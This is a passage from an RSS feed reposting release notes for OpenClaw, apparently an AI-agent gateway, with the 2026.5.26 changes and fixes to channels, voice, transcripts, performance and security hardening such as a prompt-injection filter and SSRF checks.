data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87375/hovercard" href="https://github.com/openclaw/openclaw/pull/87375">#87375</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534791510" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87383" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87383/hovercard" href="https://github.com/openclaw/openclaw/pull/87383">#87383</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4535326369" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87400" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87400/hovercard" href="https://github.com/openclaw/openclaw/pull/87400">#87400</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Alix-007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Alix-007">@Alix-007</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luoyanglang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luoyanglang">@luoyanglang</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yetval/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yetval">@yetval</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sjf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sjf">@sjf</a>.</li>
<li>Channels: thread canonical session keys into outbound hooks, preserve Matrix room-id case, keep fallback tool warnings mention-inert, retain delivered Slack final replies during late cleanup, continue iMessage polling after denied reactions, suppress duplicate native exec approvals, preserve Telegram SecretRef prompt config, suppress Discord recovered tool warnings, and block untrusted Teams service URLs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345081037" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73706" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73706/hovercard" href="https://github.com/openclaw/openclaw/pull/73706">#73706</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364693778" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75670" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75670/hovercard" href="https://github.com/openclaw/openclaw/issues/75670">#75670</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534435733" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87366" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87366/hovercard" href="https://github.com/openclaw/openclaw/pull/87366">#87366</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4536461472" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87451" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87451/hovercard" href="https://github.com/openclaw/openclaw/pull/87451">#87451</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4533570288" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87334" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87334/hovercard" href="https://github.com/openclaw/openclaw/pull/87334">#87334</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zeroaltitude/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zeroaltitude">@zeroaltitude</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lukeboyett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lukeboyett">@lukeboyett</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xiaotian/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiaotian">@xiaotian</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eleqtrizit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eleqtrizit">@eleqtrizit</a>.</li>
<li>CLI/auth/doctor/providers: reject malformed numeric/timeout/subcommand-version inputs, wait for respawn child shutdown, bound Codex and GitHub Copilot OAuth/token requests, warm provider auth off the main thread, honor Codex response timeouts, bound local service startup, resolve GPT-5.5 without cached catalog, migrate legacy memory auto-provider config, rewrite non-canonical <code>api_key</code> auth profiles, and make doctor restart follow-ups actionable. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4535278756" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87398" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87398/hovercard" href="https://github.com/openclaw/openclaw/pull/87398">#87398</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4513750971" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86281" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86281/hovercard" href="https://github.com/openclaw/openclaw/pull/86281">#86281</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534263190" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87361" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87361/hovercard" href="https://github.com/openclaw/openclaw/pull/87361">#87361</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Patrick-Erichsen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Patrick-Erichsen">@Patrick-Erichsen</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/giodl73-repo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/giodl73-repo">@giodl73-repo</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alkor2000/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alkor2000">@alkor2000</a>.</li>
<li>Gateway/security/session state: expire browser tokens after auth rotation, scope assistant idempotency dedupe, drain probe client closes, avoid stale restart continuation reuse, preserve retry-after fallbacks, bound webchat image and artifact transcript scans, include seconds in inbound metadata timestamps, and evict current plugin-state namespaces at row caps.</li>
<li>Config/parsing/network: reject partial numeric parsing, parse provider/Discord retry headers and dates strictly, honor IPv6 and bare IPv6 <code>no_proxy</code> entries, canonicalize secret target array indexes, and reject malformed media content lengths, inspected TCP ports, marketplace content lengths, cron epochs, and sandbox stat fields.</li>
<li>Providers/agents: preserve seeded Anthropic signatures, concatenate signature-delta chunks, preserve DeepSeek <code>reasoning_content</code> replay across tier suffixes, apply OpenRouter strict9 ids to Mistral routes, promote Ollama plain-text tool calls, and recover empty preflight compaction. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4539098619" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87593" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87593/hovercard" href="https://github.com/openclaw/openclaw/pull/87593">#87593</a>)</li>
<li>File transfer: handle late tar stdin pipe errors after archive validation or unpacking has already settled.</li>
<li>Performance: trust install-record caches between reloads, prefer native JSON parsing, reuse unchanged tool-search catalogs, skip unchanged store serialization, add precomputed session patch writers, reduce store clone allocations, cache manifest model catalog rows and auto-enabled plugin config, and slim current metadata identity caches.</li>
<li>Docker/release/QA: package runtime workspace templates, stream cross-OS served artifacts, preserve sparse Crabbox run artifacts, bound OpenClaw instance logs, plugin gauntlet relay logs, MCP channel buffers, kitchen-sink scans, agent-turn assertions, and release scenario logs, and keep release/google live guards current.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw 2026.5.26]]></title>
<description><![CDATA[2026.5.26
Highlights

Faster Gateway and replies: startup avoids repeated plugin, channel, session, usage-cost, warning, scheduled-service, and filesystem scans; visible replies separate user-facing sends from slower follow-up work; Gateway runtime/session caches churn less under load.
Transcript...]]></description>
<link>https://tsecurity.de/de/3550892/downloads/openclaw-2026526/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3550892/downloads/openclaw-2026526/</guid>
<pubDate>Wed, 27 May 2026 13:46:34 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.5.26</h2>
<h3>Highlights</h3>
<ul>
<li>Faster Gateway and replies: startup avoids repeated plugin, channel, session, usage-cost, warning, scheduled-service, and filesystem scans; visible replies separate user-facing sends from slower follow-up work; Gateway runtime/session caches churn less under load.</li>
<li>Transcripts are core: transcript-backed meeting summaries, source-provider chunks, cleaned user turns, media provenance, Codex mirrors, WebChat replies, and CLI/TUI replay now use one more reliable transcript path.</li>
<li>More channels are production-ready: Telegram keeps typing/progress context and forum topics, iMessage handles attachment roots, remote media staging, and duplicate local Messages sources, WhatsApp restores group/media behavior, Discord improves voice playback and model picking, and Signal/iMessage/WhatsApp get reaction approvals.</li>
<li>Better voice and Talk: realtime Talk runs can be inspected, steered, cancelled, or followed up from Web UI and Discord voice; wake-name handling is more tolerant without letting ambient speech trigger agents.</li>
<li>Safer content boundaries: Browser snapshot reads honor SSRF policy, system-event text cannot spoof nested prompt markers, fetched file text is wrapped as external content, ClickClack inbound sender allowlists run before agent dispatch, stale device tokens are rejected, and serialized tool-call text is scrubbed from replies.</li>
<li>Providers, Codex, and local models are steadier: named auth profiles, OpenAI sampling params, Codex app-server resume/timeout/usage-limit recovery, dynamic tool-schema guards, xAI usage-limit surfacing, Ollama top-p normalization, and local approval resolution reduce provider-specific dead ends.</li>
<li>More reliable install/update/release paths: Alpine installs, trusted runtime fallback roots, stable update channels, Docker/package timeouts, Windows Scheduled Tasks, Windows/macOS proof lanes, Testbox/Crabbox delegation, plugin publish checks, and macOS runner bootstraps all got hardened.</li>
<li>Better observability: Activity tab, gateway secret-prep traces, tool/model stream progress, explicit fast-mode status, systemd Gateway hygiene, OpenTelemetry LLM spans, release performance evidence, and richer telemetry signals make failures easier to inspect.</li>
</ul>
<h3>Changes</h3>
<ul>
<li>Transcripts: add core transcript capture and source-provider support for transcript-backed meeting summaries, including the renamed Transcripts docs, CLI surface, source-provider chunks, and cleaned user-turn persistence.</li>
<li>Auth: add named model login profiles and supported credential migration for Hermes, OpenCode, and Codex auth profiles, with explicit opt-out and non-interactive controls. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4507376112" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85667" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85667/hovercard" href="https://github.com/openclaw/openclaw/pull/85667">#85667</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fuller-stack-dev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fuller-stack-dev">@fuller-stack-dev</a>.</li>
<li>Diagnostics: trace gateway secret preparation, classify skill/tool usage, surface model stream progress, add OpenTelemetry LLM content spans, and expose alertable telemetry for blocked tools, failover, stale sessions, liveness, oversized payloads, and webhook ingress. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462942195" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83019" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83019/hovercard" href="https://github.com/openclaw/openclaw/pull/83019">#83019</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4416373435" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80370" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/80370/hovercard" href="https://github.com/openclaw/openclaw/pull/80370">#80370</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4512822495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86191" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86191/hovercard" href="https://github.com/openclaw/openclaw/pull/86191">#86191</a>)</li>
<li>Channels: add Signal reaction approvals, iMessage thumb approval reactions, and WhatsApp thumb approval reaction support so mobile approval flows work without textual <code>/approve</code> commands. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4510153620" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85894" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85894/hovercard" href="https://github.com/openclaw/openclaw/pull/85894">#85894</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4510696445" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85952" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85952/hovercard" href="https://github.com/openclaw/openclaw/pull/85952">#85952</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4504724227" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85477" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85477/hovercard" href="https://github.com/openclaw/openclaw/pull/85477">#85477</a>)</li>
<li>Agents/API: forward OpenAI sampling params through the Gateway and expose estimated context-budget status for active agent runs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4476707401" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84094" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84094/hovercard" href="https://github.com/openclaw/openclaw/pull/84094">#84094</a>)</li>
<li>TUI/status: queue prompts submitted while an agent is busy and show explicit fast-mode state plus richer systemd Gateway hygiene in status output. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4520738163" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86722" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86722/hovercard" href="https://github.com/openclaw/openclaw/pull/86722">#86722</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4528872767" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87115" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87115/hovercard" href="https://github.com/openclaw/openclaw/pull/87115">#87115</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4526043965" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86976" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86976/hovercard" href="https://github.com/openclaw/openclaw/pull/86976">#86976</a>)</li>
<li>Exec approvals: hide durable approval actions that are unavailable for the current prompt and keep approval runtime tokens local-only so stale prompts cannot offer misleading controls. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4513659607" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86270" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86270/hovercard" href="https://github.com/openclaw/openclaw/pull/86270">#86270</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4514921556" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86359" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86359/hovercard" href="https://github.com/openclaw/openclaw/pull/86359">#86359</a>)</li>
<li>Plugin SDK: add reaction approval helpers and keep diagnostic event root exports discoverable across function-name and alias-bound module graphs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4520951336" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86735" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86735/hovercard" href="https://github.com/openclaw/openclaw/pull/86735">#86735</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4528316238" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87084" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87084/hovercard" href="https://github.com/openclaw/openclaw/pull/87084">#87084</a>)</li>
<li>Android/iOS: add the Android pair-new-gateway action and improve mobile Talk mode surfaces, including iOS realtime Talk mode and Android offline voice/gateway recovery. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4522311194" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86798" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86798/hovercard" href="https://github.com/openclaw/openclaw/pull/86798">#86798</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4514830688" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86355" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86355/hovercard" href="https://github.com/openclaw/openclaw/pull/86355">#86355</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ngutman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ngutman">@ngutman</a>.</li>
<li>Performance: cache plugin metadata snapshots, package realpaths, stable gateway metadata, model cost indexes, channel resolution, usage-cost indexes, and session/auth hot-path facts so common Gateway and reply paths do less rediscovery. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4488512713" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/84649" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/84649/hovercard" href="https://github.com/openclaw/openclaw/pull/84649">#84649</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4509730151" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85843" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85843/hovercard" href="https://github.com/openclaw/openclaw/pull/85843">#85843</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4517570243" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86517" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86517/hovercard" href="https://github.com/openclaw/openclaw/pull/86517">#86517</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4520170077" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86678" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86678/hovercard" href="https://github.com/openclaw/openclaw/pull/86678">#86678</a>)</li>
<li>Voice: expose shared realtime turn-context tracking through the realtime voice SDK and reuse it for Discord speaker attribution and wake-name context recovery.</li>
<li>Voice: reuse shared realtime output activity tracking in Google Meet command and node audio bridges, including recent-output checks for local barge-in detection.</li>
<li>Voice: expose shared realtime output activity tracking through the realtime voice SDK and reuse it for Discord playback activity and barge-in decisions.</li>
<li>Voice: expose shared realtime consult question matching, speakable-result extraction, and alias-aware forced-consult coordination through the realtime voice SDK, then reuse it in Gateway Talk, Voice Call, and Discord voice paths.</li>
<li>Voice: share activation-name matching and consult-transcript screening through the realtime voice SDK so Discord, browser voice, and meeting surfaces can reuse one implementation.</li>
<li>Cron: default <code>cron.maxConcurrentRuns</code> to 8 so scheduled automations and their isolated agent turns can make progress in parallel without explicit configuration.</li>
<li>QA-Lab: add <code>qa coverage --match &lt;query&gt;</code> so focused proof selection can discover matching scenarios from existing metadata before running live or remote lanes.</li>
<li>Discord/model picker: surface an alpha-bucket select (e.g. <code>A–G (12) · H–N (18) · O–Z (5)</code>) when the provider list or a provider's model list exceeds 25 items, so configs with <code>provider/*</code> wildcards stay one click from the right page instead of paginating through prev/next; falls back to numeric chunks when every item shares the same first letter.</li>
<li>Control UI: add an ephemeral Activity tab for sanitized live tool activity summaries without persisting raw telemetry. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3917789057" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/12831" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/12831/hovercard" href="https://github.com/openclaw/openclaw/issues/12831">#12831</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>Build: include <code>ui:build</code> in the <code>full</code> and <code>ciArtifacts</code> profiles of <code>scripts/build-all.mjs</code> so <code>pnpm build</code> always rebuilds <code>dist/control-ui</code> after <code>tsdown</code> cleans <code>dist</code>, removing the second-command requirement and the missing-asset failure mode for source/runtime installs and CI artifact uploads. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4499721411" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85206" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/85206/hovercard" href="https://github.com/openclaw/openclaw/issues/85206">#85206</a>)</li>
<li>iOS: improve Talk mode with direct realtime voice sessions, compact toolbar status, and responsive voice waveform feedback. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4514830688" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86355" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86355/hovercard" href="https://github.com/openclaw/openclaw/pull/86355">#86355</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ngutman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ngutman">@ngutman</a>.</li>
<li>Media: replace the Sharp image backend with Rastermill for metadata, resizing, EXIF orientation, and PNG alpha-preserving optimization so OpenClaw no longer installs Sharp or the WhatsApp Jimp fallback for image processing. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4516124165" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86437" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86437/hovercard" href="https://github.com/openclaw/openclaw/pull/86437">#86437</a>)</li>
<li>Codex: update the bundled Codex CLI to 0.134.0 and keep native compaction disabled for budget-triggered app-server turns so OpenClaw owns the recovery boundary. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4521805566" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86772" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86772/hovercard" href="https://github.com/openclaw/openclaw/pull/86772">#86772</a>)</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>
<p>Memory/security: reject prompt-like text submitted through the explicit <code>memory_store</code> tool before embedding or storage, matching the existing auto-capture prompt-injection filter. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4529278840" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87142" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87142/hovercard" href="https://github.com/openclaw/openclaw/pull/87142">#87142</a>)</p>
</li>
<li>
<p>Gateway/security: enable the default auth rate limiter for remote non-browser and HTTP gateway auth failures when <code>gateway.auth.rateLimit</code> is unset, while preserving the loopback exemption. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4529328719" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87148" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87148/hovercard" href="https://github.com/openclaw/openclaw/pull/87148">#87148</a>)</p>
</li>
<li>
<p>Security/content boundaries: validate Browser snapshot tab URLs against SSRF policy before ChromeMCP or direct CDP reads, sanitize queued system-event text so untrusted plugin/channel labels cannot spoof nested prompt markers, wrap fetched file text and metadata as external content, apply ClickClack <code>allowFrom</code> sender allowlists before agent dispatch, reject RPCs from invalidated device-token clients during rotation, require staged sandbox media refs, and scrub serialized tool-call text from replies. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4392560789" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/78526" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/78526/hovercard" href="https://github.com/openclaw/openclaw/pull/78526">#78526</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4528542196" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87094" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87094/hovercard" href="https://github.com/openclaw/openclaw/pull/87094">#87094</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4528022916" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87062" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87062/hovercard" href="https://github.com/openclaw/openclaw/pull/87062">#87062</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4472152384" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83741" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83741/hovercard" href="https://github.com/openclaw/openclaw/pull/83741">#83741</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317741554" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70707" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70707/hovercard" href="https://github.com/openclaw/openclaw/pull/70707">#70707</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4524708660" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86924" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86924/hovercard" href="https://github.com/openclaw/openclaw/pull/86924">#86924</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zsxsoft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zsxsoft">@zsxsoft</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ttzero25/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ttzero25">@ttzero25</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mmaps/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mmaps">@mmaps</a>.</p>
</li>
<li>
<p>Transcripts/user turns: persist CLI, WebChat, media, follow-up, hook, and Codex-mirror user turns to the admitted session target; keep cleaned transcript text, inline image routing, provenance metadata, replay hooks, and fallback paths idempotent when runtimes fail or restart.</p>
</li>
<li>
<p>TUI/status/onboarding/UI: queue busy TUI prompts instead of dropping them, preserve the configured default model during onboarding, show failed tool results as errors, show config-open failures in Control UI, keep status JSON plugin scans healthy, preserve xAI usage-limit errors locally, and expose explicit fast-mode/systemd state. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4520738163" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86722" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86722/hovercard" href="https://github.com/openclaw/openclaw/pull/86722">#86722</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4526651884" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87000" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87000/hovercard" href="https://github.com/openclaw/openclaw/pull/87000">#87000</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4508988920" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/85786" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/85786/hovercard" href="https://github.com/openclaw/openclaw/pull/85786">#85786</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4528777005" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87108" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87108/hovercard" href="https://github.com/openclaw/openclaw/pull/87108">#87108</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4526678539" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87001" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87001/hovercard" href="https://github.com/openclaw/openclaw/pull/87001">#87001</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4519059143" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86614" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86614/hovercard" href="https://github.com/openclaw/openclaw/pull/86614">#86614</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4528872767" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/87115" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/87115/hovercard" href="https://github.com/openclaw/openclaw/pull/87115">#87115</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4526043965" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/86976" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/86976/hovercard" href="https://github.com/openclaw/openclaw/pull/86976">#86976</a>)</p>
</li>
<li>
